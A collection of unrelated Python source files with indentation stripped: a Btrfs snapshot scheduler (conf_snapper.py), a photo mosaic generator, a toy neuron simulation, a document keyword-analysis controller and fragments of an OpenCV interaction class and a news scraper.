if has_windows or has_capture_keys:
wait_key_time = max(1, int(sleep_time*1000) )
ord_key = cv2.waitKey(wait_key_time)
shift_pressed = False
if ord_key != -1:
if chr(ord_key) >= 'A' and chr(ord_key) <= 'Z':
shift_pressed = True
ord_key += 32
else:
if sleep_time != 0:
time.sleep(sleep_time)
if has_capture_keys and ord_key != -1:
for wnd_name in self.capture_keys_windows:
self.add_key_event (wnd_name, ord_key, False, False, shift_pressed)
def on_wait_any_key(self):
cv2.waitKey(0)
class InteractColab(InteractBase):
def is_colab(self):
return True
def on_destroy_all_windows(self):
pass
#clear_output()
def on_create_window (self, wnd_name):
pass
#clear_output()
def on_show_image (self, wnd_name, img):
pass
# # cv2 stores colors as BGR; convert to RGB
# if img.ndim == 3:
# if img.shape[2] == 4:
# img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGBA)
# else:
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# img = PIL.Image.fromarray(img)
# plt.imshow(img)
# plt.show()
def on_capture_mouse (self, wnd_name):
pass
#print("on_capture_mouse(): Colab does not support")
def on_capture_keys (self, wnd_name):
pass
#print("on_capture_keys(): Colab does not support")
def on_process_messages(self, sleep_time=0):
time.sleep(sleep_time)
def on_wait_any_key(self):
pass
#print("on_wait_any_key(): Colab does not support")
if is_colab:
interact = InteractColab()
else:
interact = InteractDesktop()
|
conf_snapper.py
|
#!/usr/bin/python
"""
This is a script that runs configuration snapper for Btrfs. Configuration is provided
in a file.
"""
import argparse
import datetime
import json
import logging
import os
import signal
import socket
import sys
import threading
import time
import traceback
# requires installation of schedule
# sudo apt-get -y install python-pip
# sudo pip install apscheduler
from apscheduler.schedulers.blocking import BlockingScheduler
from logging.handlers import RotatingFileHandler
import BtrfsStorage
import SnapshotConfiguration
from SnapshotConfiguration import TimeUnit
log_file_name = 'conf_snapper.log';
log_file = '/var/log/conf_snapper/' + log_file_name;
global_stopper_list = [];
#TODO: change DEBUG to INFO (before full production deployment)
log_level = logging.DEBUG
#Singleton Btrfs storage defined as a snapshot Facade
btrfs = BtrfsStorage.BtrfsStorage()
snapper_status_file = "/var/log/conf_snapper/snapper_status.json"
class StateStatus(object):
up = "up"
down = "down"
suspended = "suspended"
stopped = "stopped"
class State:
status = StateStatus.down;
hasConfigurationError = False;
configurationErrorReason = ""
hasRuntimeError = False;
runtimeErrorReason = ""
def writeStatusJson(self):
logger = logging.getLogger();
json_data_string = {}
json_data_string["status"] = self.status
json_data_string["hasConfigurationError"] = self.hasConfigurationError
json_data_string["hasRuntimeError"] = self.hasRuntimeError
json_data_string["configurationErrorReason"] = self.configurationErrorReason
json_data_string["runtimeErrorReason"] = self.runtimeErrorReason
with open(snapper_status_file, 'w') as outfile:
json.dump(json_data_string, outfile)
logger.info("Writing current status...")
def reset(self):
self.status = StateStatus.down;
self.hasConfigurationError = False;
self.configurationErrorReason = ""
self.hasRuntimeError = False;
self.runtimeErrorReason = ""
state = State()
#------------- Global functions section. Mainly used by scheduler ------------------
# Function returns one snapshot before last. Expects time sorted list in snapshots.
def getPreviousPathToSnapshot(snapshots, snappshot):
logger = logging.getLogger();
snapshot_len = len(snapshots)
logger.debug(snapshots)
if(snapshot_len == 0) :
logger.error("Wrong number of snapshots (%d), 2 is expected, returns None", snapshot_len);
state.hasRuntimeError = True;
state.hasRuntimeError = "Wrong number of snapshots " + snapshot_len + " 2 is expected. Snapshot: " + snappshot.snapshotName;
state.writeStatusJson();
return None
if(snapshot_len > 2) :
logger.error("Wrong number of snapshots (%d), 2 is expected, takes the last %s", snapshot_len, snapshots[-1]);
state.hasRuntimeError = True;
state.hasRuntimeError = "Wrong number of snapshots " + snapshot_len + " 2 is expected, takes the last " + snapshots[-1] + ".Snapshot: " + snappshot.snapshotName;
state.writeStatusJson();
return snapshots[-1]
return snapshots[0]
# Function returns last snapshot. Expects time sorted list in snapshots.
def getLastPathToSnapshot(snapshots, snappshot):
logger = logging.getLogger();
snapshot_len = len(snapshots)
logger.debug(snapshots)
if(snapshot_len == 0) :
logger.error("Wrong number of snapshots (%d), 2 is expected, returns None", snapshot_len);
return None
return snapshots[-1]
#Function creates or updates (remove->create) symbolic link for given snapshot.
def createSymbolicLink(snapshot, snapshotPath):
logger = logging.getLogger();
if(snapshotPath == None):
logger.error("Path is None, do nothing.")
return
snapshotRootPath = btrfs.getSnapshotFolder(snapshot)
fullName = snapshotRootPath + '/' + snapshotPath
symbolicLinkPath = snapshot.snapshotLink;
logger.info("Creating symbolic link '%s' to path '%s", symbolicLinkPath, fullName)
if os.geteuid() != 0:
logger.error("The script was run without root privileges. Symbolic link will not be created.")
else:
if os.path.islink(symbolicLinkPath):
logger.debug("The path %s exist, removing it.", symbolicLinkPath)
os.unlink(symbolicLinkPath)
else:
logger.debug("The path %s does not exist.", symbolicLinkPath)
os.symlink(fullName, symbolicLinkPath)
def isServiceDisabled():
logger = logging.getLogger();
logger.debug("Checking if snapshot should be taken.")
for stopper in global_stopper_list:
if os.path.exists(stopper) == True:
logger.debug("File %s exists!", stopper)
state.status = StateStatus.suspended;
state.writeStatusJson();
return False;
state.status = StateStatus.up
state.writeStatusJson();
return True;
# Creates snapshot according to snapshot configuration.
# Mainly, this function is used by scheduler, but also can be used directly from code.
# The difference between sched and manual call is future link updates which are not created in manual creation.
def takeSnapshot(snapper, snapshot, isManualCall = False):
# self.logger.info("I'm working....")
snapper.logger.info("Snapshot %s will be taken", snapshot.getFullName())
if isServiceDisabled() == False:
snapper.logger.info("Service is disabled, ignoring...");
return;
if btrfs.takeSnapshot(snapshot) == False:
state.hasRuntimeError = True;
state.runtimeErrorReason = "Failed to create snapshot for " + snapshot.getFullName() + " repository";
current_snapshots = btrfs.deleteSnapshot(snapshot)
#assuming all file names are sorted according to creation time.
createSymbolicLink(snapshot, getPreviousPathToSnapshot(current_snapshots, snapshot));
if isManualCall == False:
#add new job for replacing symbolic link to latest one
time_now = int(time.time())
if snapshot.snapshotUnits == TimeUnit.sec:
time_now += (snapshot.snapshotFrequency/2)
elif snapshot.snapshotUnits == TimeUnit.min:
time_now += ((snapshot.snapshotFrequency*60)/2)
elif snapshot.snapshotUnits == TimeUnit.hour:
time_now += ((snapshot.snapshotFrequency*60*60)/2)
elif snapshot.snapshotUnits == TimeUnit.day:
time_now += ((snapshot.snapshotFrequency*60*60*24)/2)
else:
snapper.logger.error("Wrong time unit.")
nextTimeStr = datetime.datetime.fromtimestamp(time_now).strftime("%Y-%m-%d %H:%M:%S")
snapper.logger.debug('nextTimeStr: ' + nextTimeStr)
snapper.sched.add_job(updateSnapshotLink, 'date', run_date=nextTimeStr, args=[current_snapshots, snapshot])
# Updates snapshot link scheduled by scheduler.
def updateSnapshotLink(current_snapshots, snapshot):
logger = logging.getLogger();
logger.debug("Going to update symbolic link to latest snapshot.\n")
if isServiceDisabled() == False:
snapper.logger.info("Service is disabled, ignoring...");
return;
createSymbolicLink(snapshot, getLastPathToSnapshot(current_snapshots, snapshot));
# Cleans all jobs and terminates a scheduler.
def shutdown(snapper):
snapper.sched.remove_all_jobs();
snapper.sched.shutdown();
# Global helper for all snapshots cleaning.
# Can be used for manual cleaning as well as Btrfs uninstal.
def detele_all_snapshots_for_all_repositories(snapper):
logger = logging.getLogger();
logger.info("Going to delete all snapshots for all repositories.")
print "Going to delete all snapshots for all repositories.\n";
for snapshot in snapper.configuration:
logger.info("Deleting all snapshots for snapshot %s.\n", snapshot.getFullName())
print "Deleting all snapshots for snapshot " + snapshot.getFullName();
btrfs.deleteSnapshot(snapshot, True);
symbolicLinkPath = snapshot.snapshotLink;
if os.path.islink(symbolicLinkPath):
print "Deleting link " + symbolicLinkPath
logger.info("Deleting link " + symbolicLinkPath)
os.unlink(symbolicLinkPath)
print "Deletion has been finished. For more information please check " + log_file
logger.info("Deletion has been finished. Please check '" + log_file + "' for more information")
#helper function for single process execution.
def get_lock(process_name):
logger = logging.getLogger();
global lock_socket # Without this our lock gets garbage collected
lock_socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
lock_socket.bind('\0' + process_name)
logger.info("I got the lock. I'm a single process.")
except socket.error:
logger.error("There is an another instance of %s is running.", process_name)
print "There is an another instance of '" + process_name + "' is running.", process_name
sys.exit(10)
# --------------------- Snapper section -----------------------------
class Snapper:
configuration = [];
sched = None;
def __init__(self):
# log initialization
self.logger = logging.getLogger()
hdlr = RotatingFileHandler(log_file, maxBytes=1024*1024*20, backupCount=4)
# hdlr2 - used for stdout (system.out).
hdlr2 = logging.StreamHandler()
formatter = logging.Formatter("%(asctime)s (%(thread)d) %(levelname)s\t%(funcName)s: %(message)s", "%Y-%m-%d %H:%M:%S")
hdlr.setFormatter(formatter)
hdlr2.setFormatter(formatter)
self.logger.addHandler(hdlr)
#Enable hdlr2 for manual running and logs to system.out.
#self.logger.addHandler(hdlr2)
self.logger.setLevel(log_level)
# default configuration file.
self.conf_file = '/etc/conf_snapper/snapper_conf.json'
self.running = True
#Validation for first time run
def checkSnapsotOnStartUp(self, snapshot):
symbolicLinkPath = snapshot.snapshotLink;
if os.path.islink(symbolicLinkPath):
logger.debug("The path %s exist. Noting to do.", symbolicLinkPath)
return;
logger.debug("The path %s does not exist on startup, creating first snapshot.", symbolicLinkPath)
takeSnapshot(self, snapshot, True)
# Configuration loader
def config(self, alt_path):
if alt_path != None:
self.conf_file = alt_path
self.logger.info("Using configuration file %s", self.conf_file)
with open(self.conf_file) as fh:
self.logger.debug("Loaded conf file.")
json_snapper_configuration = json.load(fh)['snapper_configuration']
repositories = json_snapper_configuration['repositories']
for repository in repositories:
if not repository.get('name'):
self.logger.debug("Name parameter was not fount... continue")
state.hasConfigurationError = True;
state.configurationErrorReason = "Name parameter was not fount...";
continue
for snapshot in repository['snapshot_levels']:
snapshotConf = SnapshotConfiguration.SnapshotConfiguration(repository['name'],
repository['path'],
snapshot['name'],
snapshot['frequency'],
snapshot['link'],
TimeUnit.fromstring(snapshot['unit'])
);
self.logger.debug("%s loaded", snapshotConf.getFullName());
self.logger.debug(snapshotConf);
if btrfs.checkRepository(snapshotConf.repositoryPath) == False:
self.logger.error("Repository path (%s) is not valid Btrfs folder", snapshotConf.repositoryPath)
state.hasConfigurationError = True;
state.configurationErrorReason = "Repository path " + snapshotConf.repositoryPath + " is not valid Btrfs folder";
continue
else:
self.logger.debug("Repository path (%s) is valid Btrfs folder", snapshotConf.repositoryPath)
if snapshotConf.snapshotLink == "":
self.logger.error("Repository link (%s) is empty", snapshotConf.snapshotLink)
state.hasConfigurationError = True;
state.configurationErrorReason = "Repository link is empty.";
else:
self.configuration.append(snapshotConf);
try:
stoppers = json_snapper_configuration['stoppers']
for stopper in stoppers:
global_stopper_list.append(stopper)
except Exception, err:
state.hasConfigurationError = True;
state.configurationErrorReason = "Stopper section does not exist. - " + traceback.format_exc();
logger.error("\n Stopper section does not exist. - %s\n" % traceback.format_exc())
def startSecJob(self, cbFunction, expression, snapshotConfig):
self.sched.add_job(cbFunction, 'cron', second=expression, args=[self, snapshotConfig], name=snapshotConfig.getFullName())
def startMinJob(self, cbFunction, expression, snapshotConfig):
self.sched.add_job(cbFunction, 'cron', minute=expression, args=[self, snapshotConfig], name=snapshotConfig.getFullName() )
def startHourJob(self, cbFunction, expression, snapshotConfig):
self.sched.add_job(cbFunction, 'cron', hour=expression, args=[self, snapshotConfig], name=snapshotConfig.getFullName() )
def startDayJob(self, cbFunction, expression, snapshotConfig):
self.sched.add_job(cbFunction, 'cron', day=expression, args=[self, snapshotConfig], name=snapshotConfig.getFullName() )
def start(self):
try:
# apscheduler::BlockingScheduler initialization.
self.sched = BlockingScheduler();
for snapshotConf in self.configuration:
#Take snapshots on startup
self.checkSnapsotOnStartUp(snapshotConf);
switcher = {
TimeUnit.sec: self.startSecJob,
TimeUnit.min: self.startMinJob,
TimeUnit.hour: self.startHourJob,
TimeUnit.day: self.startDayJob,
}
expression = '*/' + str(snapshotConf.snapshotFrequency)
func = switcher.get(snapshotConf.snapshotUnits)
#add takeSnapshot job.
func(takeSnapshot, expression, snapshotConf)
self.sched.start()
except Exception, err:
state.status = StateStatus.down;
state.hasRuntimeError = True;
state.configurationErrorReason = "Failed to start with exception: " + traceback.format_exc();
state.writeStatusJson();
sys.exit("\nFailed to start - %s\n" % traceback.format_exc())
def set_signal_handling(self, sig, frame):
logger = logging.getLogger();
#SIGINT for Ctrl+C.
#SIGTERM for stop/start service.
if sig == signal.SIGTERM or sig == signal.SIGINT:
print "Got a termination signal. Exiting..."
self.running = False
self.logger.info("Got a termination signal")
if self != None and self.sched !=None:
logger.debug("Stopping the scheduler...")
shutdown(self);
else:
logger.debug("self or sched is NONE")
state.status = StateStatus.stopped;
state.runtimeErrorReason = "Got a termination signal.";
state.writeStatusJson();
def printConfiguration(self):
print "Snapper configuration:"
for conf in self.configuration:
print conf
# -------------------- Main Section ------------------------
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Snapshot manager for Btrfs')
parser.add_argument('-c','--check',
help='Check configuration file.',
action='store_true',
dest='is_check')
parser.add_argument('-d','--delete-all',
help='Deletes all snapshots.',
action='store_true',
dest='is_delete')
parser.add_argument('configuration_file',
metavar='<configuration_file_path>',
type=argparse.FileType('r'),
nargs='?',
help='configuration file path')
args = parser.parse_args()
condiguration_file = args.configuration_file
is_check_configuration = args.is_check
is_snapshots_delete = args.is_delete
try:
# user root validation.
if os.geteuid() != 0:
log_file = log_file_name;
sys.exit("\nOnly root user can run this script\n")
snapper = Snapper();
logger = logging.getLogger();
get_lock('conf_snapper')
try:
if condiguration_file != None:
snapper.config(condiguration_file.name)
else:
snapper.config(None)
# snapper.config('snapper_conf.json')
if args.is_check:
snapper.printConfiguration();
sys.exit(0);
except Exception, err:
logger.error("\nFailed to parse configuration - %s\n" % traceback.format_exc())
state.status = StateStatus.down;
state.hasConfigurationError = True;
state.configurationErrorReason = "Failed to parse configuration - " + traceback.format_exc();
state.writeStatusJson();
sys.exit("\nFailed to parse configuration - %s\n" % traceback.format_exc())
if is_snapshots_delete == True:
detele_all_snapshots_for_all_repositories(snapper);
sys.exit(0);
signal.signal(signal.SIGTERM, snapper.set_signal_handling)
signal.signal(signal.SIGINT, snapper.set_signal_handling)
process_thread = threading.Thread(target=snapper.start, name="process_thread")
process_thread.start()
state.status = StateStatus.up;
state.writeStatusJson();
while process_thread.is_alive():
time.sleep(1)
process_thread.join()
except Exception, err:
state.status = StateStatus.down;
state.hasRuntimeError = True;
state.configurationErrorReason = "Failed to start with exception: " + traceback.format_exc();
state.writeStatusJson();
sys.exit("\nFailed to start - %s\n" % traceback.format_exc())
|
mosaic.py
|
import sys
import os, os.path
from PIL import Image, ImageOps
from multiprocessing import Process, Queue, cpu_count
# Change these 3 config parameters to suit your needs...
TILE_SIZE = 50 # height/width of mosaic tiles in pixels
TILE_MATCH_RES = 5 # tile matching resolution (higher values give better fit but require more processing)
ENLARGEMENT = 8 # the mosaic image will be this many times wider and taller than the original
TILE_BLOCK_SIZE = TILE_SIZE / max(min(TILE_MATCH_RES, TILE_SIZE), 1)
WORKER_COUNT = max(cpu_count() - 1, 1)
OUT_FILE = 'mosaic.jpeg'
EOQ_VALUE = None
class TileProcessor:
def __init__(self, tiles_directory):
self.tiles_directory = tiles_directory
def __process_tile(self, tile_path):
try:
img = Image.open(tile_path)
img = ImageOps.exif_transpose(img)
# tiles must be square, so get the largest square that fits inside the image
w = img.size[0]
h = img.size[1]
min_dimension = min(w, h)
w_crop = (w - min_dimension) / 2
h_crop = (h - min_dimension) / 2
img = img.crop((w_crop, h_crop, w - w_crop, h - h_crop))
large_tile_img = img.resize((TILE_SIZE, TILE_SIZE), Image.ANTIALIAS)
small_tile_img = img.resize((int(TILE_SIZE/TILE_BLOCK_SIZE), int(TILE_SIZE/TILE_BLOCK_SIZE)), Image.ANTIALIAS)
return (large_tile_img.convert('RGB'), small_tile_img.convert('RGB'))
except:
return (None, None)
def get_tiles(self):
large_tiles = []
small_tiles = []
print('Reading tiles from {}...'.format(self.tiles_directory))
# search the tiles directory recursively
for root, subFolders, files in os.walk(self.tiles_directory):
for tile_name in files:
print('Reading {:40.40}'.format(tile_name), flush=True, end='\r')
tile_path = os.path.join(root, tile_name)
large_tile, small_tile = self.__process_tile(tile_path)
if large_tile:
large_tiles.append(large_tile)
small_tiles.append(small_tile)
print('Processed {} tiles.'.format(len(large_tiles)))
return (large_tiles, small_tiles)
class TargetImage:
def __init__(self, image_path):
self.image_path = image_path
def get_data(self):
print('Processing main image...')
img = Image.open(self.image_path)
w = img.size[0] * ENLARGEMENT
h = img.size[1] * ENLARGEMENT
large_img = img.resize((w, h), Image.ANTIALIAS)
w_diff = (w % TILE_SIZE)/2
h_diff = (h % TILE_SIZE)/2
# if necessary, crop the image slightly so we use a whole number of tiles horizontally and vertically
if w_diff or h_diff:
large_img = large_img.crop((w_diff, h_diff, w - w_diff, h - h_diff))
small_img = large_img.resize((int(w/TILE_BLOCK_SIZE), int(h/TILE_BLOCK_SIZE)), Image.ANTIALIAS)
image_data = (large_img.convert('RGB'), small_img.convert('RGB'))
print('Main image processed.')
return image_data
class TileFitter:
def __init__(self, tiles_data):
self.tiles_data = tiles_data
def __get_tile_diff(self, t1, t2, bail_out_value):
diff = 0
for i in range(len(t1)):
#diff += (abs(t1[i][0] - t2[i][0]) + abs(t1[i][1] - t2[i][1]) + abs(t1[i][2] - t2[i][2]))
diff += ((t1[i][0] - t2[i][0])**2 + (t1[i][1] - t2[i][1])**2 + (t1[i][2] - t2[i][2])**2)
if diff > bail_out_value:
# we know already that this isn't going to be the best fit, so no point continuing with this tile
return diff
return diff
def get_best_fit_tile(self, img_data):
best_fit_tile_index = None
min_diff = sys.maxsize
tile_index = 0
# go through each tile in turn looking for the best match for the part of the image represented by 'img_data'
for tile_data in self.tiles_data:
diff = self.__get_tile_diff(img_data, tile_data, min_diff)
if diff < min_diff:
min_diff = diff
best_fit_tile_index = tile_index
tile_index += 1
return best_fit_tile_index
def fit_tiles(work_queue, result_queue, tiles_data):
# this function gets run by the worker processes, one on each CPU core
tile_fitter = TileFitter(tiles_data)
while True:
try:
img_data, img_coords = work_queue.get(True)
if img_data == EOQ_VALUE:
break
tile_index = tile_fitter.get_best_fit_tile(img_data)
result_queue.put((img_coords, tile_index))
except KeyboardInterrupt:
pass
# let the result handler know that this worker has finished everything
result_queue.put((EOQ_VALUE, EOQ_VALUE))
class ProgressCounter:
def __init__(self, total):
self.total = total
self.counter = 0
def update(self):
self.counter += 1
print("Progress: {:04.1f}%".format(100 * self.counter / self.total), flush=True, end='\r')
class MosaicImage:
def __init__(self, original_img):
self.image = Image.new(original_img.mode, original_img.size)
self.x_tile_count = int(original_img.size[0] / TILE_SIZE)
self.y_tile_count = int(original_img.size[1] / TILE_SIZE)
self.total_tiles = self.x_tile_count * self.y_tile_count
def add_tile(self, tile_data, coords):
img = Image.new('RGB', (TILE_SIZE, TILE_SIZE))
img.putdata(tile_data)
self.image.paste(img, coords)
def save(self, path):
self.image.save(path)
def build_mosaic(result_queue, all_tile_data_large, original_img_large):
mosaic = MosaicImage(original_img_large)
active_workers = WORKER_COUNT
while True:
try:
img_coords, best_fit_tile_index = result_queue.get()
if img_coords == EOQ_VALUE:
active_workers -= 1
if not active_workers:
break
else:
tile_data = all_tile_data_large[best_fit_tile_index]
mosaic.add_tile(tile_data, img_coords)
except KeyboardInterrupt:
pass
mosaic.save(OUT_FILE)
print('\nFinished, output is in', OUT_FILE)
def compose(original_img, tiles):
print('Building mosaic, press Ctrl-C to abort...')
original_img_large, original_img_small = original_img
tiles_large, tiles_small = tiles
mosaic = MosaicImage(original_img_large)
all_tile_data_large = [list(tile.getdata()) for tile in tiles_large]
all_tile_data_small = [list(tile.getdata()) for tile in tiles_small]
work_queue = Queue(WORKER_COUNT)
result_queue = Queue()
try:
# start the worker processes that will build the mosaic image
Process(target=build_mosaic, args=(result_queue, all_tile_data_large, original_img_large)).start()
# start the worker processes that will perform the tile fitting
for n in range(WORKER_COUNT):
Process(target=fit_tiles, args=(work_queue, result_queue, all_tile_data_small)).start()
progress = ProgressCounter(mosaic.x_tile_count * mosaic.y_tile_count)
for x in range(mosaic.x_tile_count):
for y in range(mosaic.y_tile_count):
large_box = (x * TILE_SIZE, y * TILE_SIZE, (x + 1) * TILE_SIZE, (y + 1) * TILE_SIZE)
small_box = (x * TILE_SIZE/TILE_BLOCK_SIZE, y * TILE_SIZE/TILE_BLOCK_SIZE, (x + 1) * TILE_SIZE/TILE_BLOCK_SIZE, (y + 1) * TILE_SIZE/TILE_BLOCK_SIZE)
work_queue.put((list(original_img_small.crop(small_box).getdata()), large_box))
progress.update()
except KeyboardInterrupt:
print('\nHalting, saving partial image please wait...')
finally:
# put these special values onto the queue to let the workers know they can terminate
for n in range(WORKER_COUNT):
work_queue.put((EOQ_VALUE, EOQ_VALUE))
def show_error(msg):
print('ERROR: {}'.format(msg))
def mosaic(img_path, tiles_path):
image_data = TargetImage(img_path).get_data()
tiles_data = TileProcessor(tiles_path).get_tiles()
if tiles_data[0]:
compose(image_data, tiles_data)
else:
show_error("No images found in tiles directory '{}'".format(tiles_path))
if __name__ == '__main__':
if len(sys.argv) < 3:
show_error('Usage: {} <image> <tiles directory>\r'.format(sys.argv[0]))
else:
source_image = sys.argv[1]
tile_dir = sys.argv[2]
if not os.path.isfile(source_image):
show_error("Unable to find image file '{}'".format(source_image))
elif not os.path.isdir(tile_dir):
show_error("Unable to find tile directory '{}'".format(tile_dir))
else:
mosaic(source_image, tile_dir)
|
neuron.py
|
import random
import itertools
import time
import signal
from threading import Thread
from multiprocessing import Pool
import multiprocessing
POTENTIAL_RANGE = 110000 # Resting potential: -70 mV Membrane potential range: +40 mV to -70 mV --- Difference: 110 mV = 110000 microVolt --- https://en.wikipedia.org/wiki/Membrane_potential
ACTION_POTENTIAL = 15000 # Resting potential: -70 mV Action potential: -55 mV --- Difference: 15mV = 15000 microVolt --- https://faculty.washington.edu/chudler/ap.html
AVERAGE_SYNAPSES_PER_NEURON = 8200 # The average number of synapses per neuron: 8,200 --- http://www.ncbi.nlm.nih.gov/pubmed/2778101
# https://en.wikipedia.org/wiki/Neuron
class Neuron():
neurons = []
def __init__(self):
self.connections = {}
self.potential = 0.0
self.error = 0.0
#self.create_connections()
#self.create_axon_terminals()
Neuron.neurons.append(self)
self.thread = Thread(target = self.activate)
#self.thread.start()
#self.process = multiprocessing.Process(target=self.activate)
def fully_connect(self):
for neuron in Neuron.neurons[len(self.connections):]:
if id(neuron) != id(self):
self.connections[id(neuron)] = round(random.uniform(0.1, 1.0), 2)
def partially_connect(self):
if len(self.connections) == 0:
neuron_count = len(Neuron.neurons)
#for neuron in Neuron.neurons:
elected = random.sample(Neuron.neurons,100)
for neuron in elected:
if id(neuron) != id(self):
#if random.randint(1,neuron_count/100) == 1:
self.connections[id(neuron)] = round(random.uniform(0.1, 1.0), 2)
print "Neuron ID: " + str(id(self))
print " Potential: " + str(self.potential)
print " Error: " + str(self.error)
print " Connections: " + str(len(self.connections))
def activate(self):
while True:
'''
for dendritic_spine in self.connections:
if dendritic_spine.axon_terminal is not None:
dendritic_spine.potential = dendritic_spine.axon_terminal.potential
print dendritic_spine.potential
self.neuron_potential += dendritic_spine.potential * dendritic_spine.excitement
terminal_potential = self.neuron_potential / len(self.axon_terminals)
for axon_terminal in self.axon_terminals:
axon_terminal.potential = terminal_potential
'''
#if len(self.connections) == 0:
# self.partially_connect()
#else:
self.partially_connect()
pass
'''
if abs(len(Neuron.neurons) - len(self.connections) + 1) > 0:
self.create_connections()
if abs(len(Neuron.neurons) - len(self.axon_terminals) + 1) > 0:
self.create_axon_terminals()
'''
class Supercluster():
def __init__(self,size):
for i in range(size):
Neuron()
print str(size) + " neurons created."
self.n = 0
self.build_connections()
#pool = Pool(4, self.init_worker)
#pool.apply_async(self.build_connections(), arguments)
#map(lambda x: x.partially_connect(),Neuron.neurons)
#map(lambda x: x.create_connections(),Neuron.neurons)
#map(lambda x: x.create_axon_terminals(),Neuron.neurons)
def build_connections(self):
for neuron in Neuron.neurons:
self.n += 1
#neuron.thread.start()
neuron.partially_connect()
print "Counter: " + str(self.n)
Supercluster(100000)
|
analyze_document_controller.py
|
from datetime import timedelta
from flashtext import KeywordProcessor
from intent_parser.intent_parser_exceptions import IntentParserException
import intent_parser.utils.intent_parser_utils as ip_utils
import logging
import os
import threading
import time
class AnalyzeDocumentController(object):
LOGGER = logging.getLogger('analyze_document_controller')
SYNC_PERIOD = timedelta(minutes=30)
ANALYZE_IGNORE_TERMS_FILE = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'analyze_ignore_terms.json')
def __init__(self):
self._ignore_terms = {}
self.analyzed_documents = {}
self._started = False
self._analyze_processing_lock = threading.Lock()
self._analyze_thread = threading.Thread(target=self._periodically_write_user_ingored_terms)
def start_analyze_controller(self):
self.LOGGER.info('Fetching ignored terms from file.')
self._analyze_processing_lock.acquire()
ignore_terms = ip_utils.load_json_file(self.ANALYZE_IGNORE_TERMS_FILE)
self._ignore_terms = ignore_terms
self._analyze_processing_lock.release()
self._started = True
self._analyze_thread.start()
def stop_synchronizing_ignored_terms(self):
self._analyze_processing_lock.acquire()
self._write_ignored_terms()
self._analyze_processing_lock.release()
self._started = False
self._analyze_thread.join()
def _periodically_write_user_ingored_terms(self):
while True:
time.sleep(self.SYNC_PERIOD.total_seconds())
self._write_ignored_terms()
def _write_ignored_terms(self):
self.LOGGER.info('Writing ignored terms to file.')
ip_utils.write_json_to_file(self._ignore_terms, self.ANALYZE_IGNORE_TERMS_FILE)
def get_all_analyzed_results(self, document_id):
if document_id not in self.analyzed_documents:
return None
analyze_document = self.analyzed_documents[document_id]
return analyze_document.get_result()
def get_first_analyze_result(self, document_id):
if document_id not in self.analyzed_documents:
return None
analyze_document = self.analyzed_documents[document_id]
results = analyze_document.get_result()
if len(results) == 0:
self.analyzed_documents.pop(document_id)
return None
return results[0]
def add_to_ignore_terms(self, user_id, term):
self._analyze_processing_lock.acquire()
if user_id not in self._ignore_terms:
self._ignore_terms[user_id] = [term]
else:
user_ignored_terms = self._ignore_terms[user_id]
if term not in user_ignored_terms:
user_ignored_terms.append(term)
self._analyze_processing_lock.release()
def remove_analyze_result_with_term(self, document_id, matching_term):
if document_id not in self.analyzed_documents:
return
analyze_document = self.analyzed_documents[document_id]
return analyze_document.remove_all(matching_term)
def remove_document(self, document_id):
if document_id not in self.analyzed_documents:
return
self.analyzed_documents.pop(document_id)
def remove_analyze_result(self, document_id, paragraph_index, matching_term, sbh_uri, start_offset, end_offset):
if document_id not in self.analyzed_documents:
return
analyze_document = self.analyzed_documents[document_id]
analyze_document.remove_first_occurrence(paragraph_index, matching_term, sbh_uri, start_offset, end_offset)
def process_dictionary_terms(self, document_id, ip_document, user_id, doc_location, dictionary_terms={}):
if not self._started:
raise IntentParserException('AnalyzeDocumentController was not initialized to load ignored terms from file.')
filtered_dictionary = self._filter_dictionary_terms(user_id, dictionary_terms)
analyze_document = self._get_or_create_analyze_document(document_id, ip_document, filtered_dictionary)
analyze_document.analyze(doc_location)
def _get_or_create_analyze_document(self, document_id, ip_document, dictionary_terms={}):
analyze_document = None
self._analyze_processing_lock.acquire()
if document_id in self.analyzed_documents:
analyze_document = self.analyzed_documents[document_id]
else:
analyze_document = _AnalyzeDocument(document_id, ip_document, dictionary_terms)
self.analyzed_documents[document_id] = analyze_document
self._analyze_processing_lock.release()
return analyze_document
def _filter_dictionary_terms(self, user_id, dictionary_terms):
self._analyze_processing_lock.acquire()
copied_dictionary = dictionary_terms.copy()
if user_id in self._ignore_terms:
for term in self._ignore_terms[user_id]:
if term in copied_dictionary:
copied_dictionary.pop(term)
self._analyze_processing_lock.release()
return copied_dictionary
class AnalyzeResult(object):
def __init__(self, paragraph_index, matching_term, sbh_uri, start_offset, end_offset):
self.paragraph_index = paragraph_index
self.matching_term = matching_term
self.sbh_uri = sbh_uri
self.start_offset = start_offset
self.end_offset = end_offset
def get_paragraph_index(self):
return self.paragraph_index
def get_matching_term(self):
return self.matching_term
def get_sbh_uri(self):
return self.sbh_uri
def get_start_offset(self):
return self.start_offset
def get_end_offset(self):
return self.end_offset
class _AnalyzeDocument(object):
def __init__(self, document_id, ip_document, dictionary_terms):
self.document_id = document_id
self.ip_document = ip_document
self.dictionary_terms = dictionary_terms
self.keyword_processor = KeywordProcessor()
self.keyword_processor.add_keywords_from_list(list(dictionary_terms.keys()))
self.result = []
def analyze(self, doc_location):
for ip_paragraph in self.ip_document.get_paragraphs():
if ip_paragraph.get_paragraph_index() < doc_location.get_paragraph_index():
continue
text = ip_paragraph.get_text()
match_results = self.keyword_processor.extract_keywords(text, span_info=True)
if not match_results:
continue
for match, start, end in match_results:
if doc_location.get_paragraph_index() == ip_paragraph.get_paragraph_index():
if start < doc_location.get_start_offset():
continue
sbh_uri = self.dictionary_terms[match]
analyze_result = AnalyzeResult(ip_paragraph.get_paragraph_index(),
match,
sbh_uri,
start,
end-1)
self.result.append(analyze_result)
def remove_first_occurrence(self, paragraph_index, matching_term, sbh_uri, start_offset, end_offset):
for index in reversed(range(len(self.result))):
analyze_result = self.result[index]
# if users want to manually enter in a sbh_uri then allow users to remove current result
# as long as the term and position where the term occurs in the document matches.
if (analyze_result.get_paragraph_index() == paragraph_index
and analyze_result.get_matching_term() == matching_term
and analyze_result.get_start_offset() == start_offset
and analyze_result.get_end_offset() == end_offset):
self.result.pop(index)
return True
return False
def remove_all(self, term):
removed_item = []
for index in reversed(range(len(self.result))):
analyze_result = self.result[index]
if analyze_result.get_matching_term() == term:
self.result.pop(index)
removed_item.append(analyze_result)
return removed_item
def get_result(self):
return self.result
|
worldnews1.py
|
import re
from bs4 import BeautifulSoup
